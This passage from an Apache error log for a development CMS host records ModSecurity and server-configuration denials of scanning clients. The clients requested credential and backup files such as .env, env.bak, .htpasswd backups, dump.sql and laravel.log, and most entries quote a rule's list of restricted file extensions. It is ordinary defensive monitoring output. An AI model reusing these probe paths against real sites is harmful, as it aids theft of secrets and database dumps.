.db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/env.bak"] [unique_id "aca5LztAQdAOanisCi9qRgAAAM0"] [Fri Mar 27 19:07:10.268515 2026] [:error] [pid 634:tid 791] [client 158.94.208.241:37142] [client 158.94.208.241] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/env.old"] [unique_id "aca5PqY29wm3SKaz_XZHgwAAAFM"] [Fri Mar 27 19:44:50.957934 2026] [authz_core:error] [pid 635:tid 780] [client 158.94.208.241:53254] AH01630: client denied by server configuration: /home/id/cms-1.dev-unit.com/.htpasswd.save [Fri Mar 27 19:46:42.132329 2026] [authz_core:error] [pid 16029:tid 16246] [client 158.94.208.241:59230] AH01630: client denied by server configuration: /home/id/cms-1.dev-unit.com/.htpasswd.backup [Fri Mar 27 19:50:32.418812 2026] [:error] [pid 887:tid 901] [client 158.94.208.241:51460] [client 158.94.208.241] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/htpasswd.bak"] [unique_id "acbDaDtAQdAOanisCi-AKwAAAMw"] [Fri Mar 27 19:50:57.351873 2026] [:error] [pid 13682:tid 13717] [client 158.94.208.241:46278] [client 158.94.208.241] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/htpasswd.old"] [unique_id "acbDgTxNrHzm7MTk15ylNwAAAUk"] [Fri Mar 27 20:26:28.756723 2026] [:error] [pid 887:tid 893] [client 158.94.208.241:33426] [client 158.94.208.241] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/dump.sql"] [unique_id "acbL1DtAQdAOanisCi-RGgAAAMQ"] [Fri Mar 27 20:52:55.604966 2026] [:error] [pid 16029:tid 16269] [client 158.94.208.241:44264] [client 158.94.208.241] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/storage/logs/laravel.log"] [unique_id "acbSB1GMC1fM57wz1nCHYQAAAQg"] [Sun Mar 29 01:36:47.168457 2026] [access_compat:error] [pid 30494:tid 30496] [client 103.158.121.29:52390] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/.env [Mon Mar 30 16:41:05.809034 2026] [access_compat:error] [pid 14201:tid 14331] [client 137.184.254.164:42666] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/.env [Mon Mar 30 16:41:49.003663 2026] [autoindex:error] [pid 9694:tid 9752] [client 137.184.254.164:57990] AH01276: Cannot serve directory /home/id/cms-1.dev-unit.com/assets/front/img/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 30 20:49:19.755854 2026] [:error] [pid 9210:tid 9395] [client 20.250.5.104:4068] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Wed Apr 01 06:08:51.331342 2026] [access_compat:error] [pid 3434:tid 3511] [client 159.195.34.121:34818] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/.env [Wed Apr 01 06:09:17.057933 2026] [access_compat:error] [pid 3434:tid 3502] [client 159.195.34.121:43412] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/.env [Wed Apr 01 13:37:04.654957 2026] [:error] [pid 3437:tid 3523] [client 185.177.72.23:49938] [client 185.177.72.23] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/env.bak"] [unique_id "ac0DYGc0odzVMFZ-9PYl4QAAAEQ"] [Wed Apr 01 19:44:44.059274 2026] [:error] [pid 30524:tid 30572] [client 172.190.142.176:48827] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Wed Apr 01 19:44:47.382368 2026] [:error] [pid 30524:tid 30562] [client 172.190.142.176:48827] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/dropdown.php